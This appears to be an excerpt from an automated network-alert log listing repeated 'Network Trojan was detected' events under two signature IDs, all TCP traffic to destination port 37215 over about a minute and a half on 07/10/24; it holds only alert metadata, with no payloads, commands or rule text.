                  SID:2835222
                  Source Port:41766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853169
                  SID:2835222
                  Source Port:54518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.551346
                  SID:2829579
                  Source Port:39474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.868570
                  SID:2829579
                  Source Port:58576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.393552
                  SID:2835222
                  Source Port:43042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.470817
                  SID:2835222
                  Source Port:39312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.330913
                  SID:2835222
                  Source Port:40916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.821569
                  SID:2829579
                  Source Port:44734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.795318
                  SID:2835222
                  Source Port:34412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.795467
                  SID:2829579
                  Source Port:54900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.118074
                  SID:2835222
                  Source Port:51956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.036336
                  SID:2835222
                  Source Port:35668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.034911
                  SID:2829579
                  Source Port:43578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.568702
                  SID:2835222
                  Source Port:59946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.646782
                  SID:2835222
                  Source Port:60646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.819826
                  SID:2829579
                  Source Port:47260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.633265
                  SID:2829579
                  Source Port:42728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.834803
                  SID:2835222
                  Source Port:34268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.127058
                  SID:2835222
                  Source Port:44780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.583920
                  SID:2835222
                  Source Port:57434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.809769
                  SID:2835222
                  Source Port:34510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.888134
                  SID:2829579
                  Source Port:51488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.823696
                  SID:2835222
                  Source Port:55090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.183618
                  SID:2835222
                  Source Port:56758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.487331
                  SID:2829579
                  Source Port:36836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.995601
                  SID:2835222
                  Source Port:51254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.716345
                  SID:2829579
                  Source Port:33190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.190112
                  SID:2835222
                  Source Port:48682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.160478
                  SID:2829579
                  Source Port:59314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989369
                  SID:2829579
                  Source Port:42154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989941
                  SID:2835222
                  Source Port:40936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.242541
                  SID:2835222
                  Source Port:52662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.332212
                  SID:2829579
                  Source Port:40946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.848690
                  SID:2829579
                  Source Port:48236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.077497
                  SID:2829579
                  Source Port:36950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.540257
                  SID:2829579
                  Source Port:43136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2829579
                  Source Port:49692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.842183
                  SID:2835222
                  Source Port:44016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.703676
                  SID:2829579
                  Source Port:53980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.428248
                  SID:2835222
                  Source Port:50668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.067488
                  SID:2829579
                  Source Port:43488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.964289
                  SID:2835222
                  Source Port:34280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.474549
                  SID:2835222
                  Source Port:42474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.469392
                  SID:2835222
                  Source Port:36708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483196
                  SID:2835222
                  Source Port:55996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.845798
                  SID:2829579
                  Source Port:34570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.441916
                  SID:2829579
                  Source Port:58650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.572327
                  SID:2835222
                  Source Port:52090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.373871
                  SID:2835222
                  Source Port:45078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.864839
                  SID:2829579
                  Source Port:43726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.931065
                  SID:2835222
                  Source Port:53006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008583
                  SID:2829579
                  Source Port:34248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.870319
                  SID:2829579
                  Source Port:34388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.844415
                  SID:2829579
                  Source Port:53636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.999319
                  SID:2829579
                  Source Port:33668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.542199
                  SID:2829579
                  Source Port:52566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.187419
                  SID:2829579
                  Source Port:39820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.379030
                  SID:2835222
                  Source Port:59716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.869834
                  SID:2829579
                  Source Port:52714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.771211
                  SID:2835222
                  Source Port:47148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.758689
                  SID:2835222
                  Source Port:44432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721350
                  SID:2835222
                  Source Port:34824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.525834
                  SID:2829579
                  Source Port:58978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.901081
                  SID:2829579
                  Source Port:59832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.844415
                  SID:2829579
                  Source Port:33010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.587142
                  SID:2835222
                  Source Port:45442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.381146
                  SID:2835222
                  Source Port:57924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.600235
                  SID:2835222
                  Source Port:56850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.358429
                  SID:2835222
                  Source Port:59240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.891770
                  SID:2835222
                  Source Port:42000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.083078
                  SID:2829579
                  Source Port:54774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.526504
                  SID:2829579
                  Source Port:58528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469425
                  SID:2829579
                  Source Port:47982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.521470
                  SID:2835222
                  Source Port:43068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.325434
                  SID:2835222
                  Source Port:37134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.236089
                  SID:2829579
                  Source Port:33940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.707139
                  SID:2835222
                  Source Port:59894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.963360
                  SID:2829579
                  Source Port:45530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.160309
                  SID:2829579
                  Source Port:40350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.182534
                  SID:2835222
                  Source Port:59228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.645558
                  SID:2829579
                  Source Port:44918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.206981
                  SID:2829579
                  Source Port:43548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.454505
                  SID:2829579
                  Source Port:52892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.514451
                  SID:2835222
                  Source Port:48312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.198870
                  SID:2835222
                  Source Port:55652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.081340
                  SID:2835222
                  Source Port:58250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.126116
                  SID:2835222
                  Source Port:47554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.148356
                  SID:2835222
                  Source Port:39234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.454702
                  SID:2835222
                  Source Port:48250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.930240
                  SID:2829579
                  Source Port:56412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.657742
                  SID:2829579
                  Source Port:39008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.316090
                  SID:2829579
                  Source Port:37502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.622181
                  SID:2835222
                  Source Port:35604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.909610
                  SID:2829579
                  Source Port:41040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.355278
                  SID:2829579
                  Source Port:47848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.539411
                  SID:2829579
                  Source Port:49784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.494634
                  SID:2829579
                  Source Port:60798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.075105
                  SID:2835222
                  Source Port:33990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.240968
                  SID:2829579
                  Source Port:38612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.746673
                  SID:2829579
                  Source Port:49602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.503966
                  SID:2835222
                  Source Port:40938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.535069
                  SID:2835222
                  Source Port:58456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.441344
                  SID:2829579
                  Source Port:39286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.426882
                  SID:2829579
                  Source Port:56054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.789175
                  SID:2835222
                  Source Port:42216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.257130
                  SID:2829579
                  Source Port:34334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.562651
                  SID:2835222
                  Source Port:35536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.074173
                  SID:2829579
                  Source Port:34138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.249452
                  SID:2835222
                  Source Port:46908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.403576
                  SID:2835222
                  Source Port:50992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.371486
                  SID:2835222
                  Source Port:36952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.927319
                  SID:2829579
                  Source Port:35336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.547528
                  SID:2829579
                  Source Port:51990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.466916
                  SID:2835222
                  Source Port:49990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.071097
                  SID:2835222
                  Source Port:41312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.144714
                  SID:2829579
                  Source Port:54936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.507738
                  SID:2829579
                  Source Port:35094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.994727
                  SID:2829579
                  Source Port:53278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.848972
                  SID:2829579
                  Source Port:34726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.098663
                  SID:2829579
                  Source Port:60604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.293782
                  SID:2835222
                  Source Port:51522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.933902
                  SID:2835222
                  Source Port:44538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.612938
                  SID:2835222
                  Source Port:55182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.213907
                  SID:2829579
                  Source Port:58918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.296401
                  SID:2829579
                  Source Port:43344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.834981
                  SID:2829579
                  Source Port:42690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.462575
                  SID:2835222
                  Source Port:52254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.526140
                  SID:2829579
                  Source Port:54476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.611873
                  SID:2829579
                  Source Port:34842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.178441
                  SID:2835222
                  Source Port:47636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.850046
                  SID:2835222
                  Source Port:47868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.211343
                  SID:2829579
                  Source Port:37612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.625043
                  SID:2835222
                  Source Port:45632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.599203
                  SID:2835222
                  Source Port:54152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.583861
                  SID:2829579
                  Source Port:47888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.739348
                  SID:2829579
                  Source Port:48380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.861470
                  SID:2829579
                  Source Port:40518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.800580
                  SID:2829579
                  Source Port:33602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.604407
                  SID:2829579
                  Source Port:51838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.015604
                  SID:2829579
                  Source Port:45604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.780112
                  SID:2835222
                  Source Port:54360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.860039
                  SID:2829579
                  Source Port:42544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.215395
                  SID:2829579
                  Source Port:35140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.499303
                  SID:2829579
                  Source Port:59414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.799492
                  SID:2835222
                  Source Port:60586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985444
                  SID:2829579
                  Source Port:56176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.777167
                  SID:2829579
                  Source Port:50070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.044301
                  SID:2835222
                  Source Port:41068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.997634
                  SID:2835222
                  Source Port:52110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.386874
                  SID:2835222
                  Source Port:45542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.805293
                  SID:2829579
                  Source Port:36540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.810871
                  SID:2829579
                  Source Port:36152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.608013
                  SID:2835222
                  Source Port:35594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.853234
                  SID:2835222
                  Source Port:43272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.423127
                  SID:2835222
                  Source Port:53830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.530342
                  SID:2829579
                  Source Port:49820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.512620
                  SID:2835222
                  Source Port:54690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.199033
                  SID:2829579
                  Source Port:41644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.667686
                  SID:2835222
                  Source Port:50798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.631449
                  SID:2829579
                  Source Port:37056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.334361
                  SID:2835222
                  Source Port:50796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.529123
                  SID:2829579
                  Source Port:53498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.140303
                  SID:2829579
                  Source Port:53994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.422786
                  SID:2829579
                  Source Port:32988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.907657
                  SID:2835222
                  Source Port:45804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912522
                  SID:2829579
                  Source Port:44680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.219271
                  SID:2835222
                  Source Port:43618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.621338
                  SID:2835222
                  Source Port:58692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.829838
                  SID:2829579
                  Source Port:50968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.977851
                  SID:2835222
                  Source Port:60952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.979498
                  SID:2829579
                  Source Port:38280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.396195
                  SID:2829579
                  Source Port:38076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.356142
                  SID:2835222
                  Source Port:39964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.476288
                  SID:2829579
                  Source Port:56178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.719591
                  SID:2835222
                  Source Port:59968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.907350
                  SID:2835222
                  Source Port:34176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.822403
                  SID:2829579
                  Source Port:54148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609289
                  SID:2829579
                  Source Port:49984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.753198
                  SID:2835222
                  Source Port:44570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.770173
                  SID:2835222
                  Source Port:54974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.651870
                  SID:2829579
                  Source Port:34590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.834226
                  SID:2829579
                  Source Port:40854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.240926
                  SID:2829579
                  Source Port:55306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
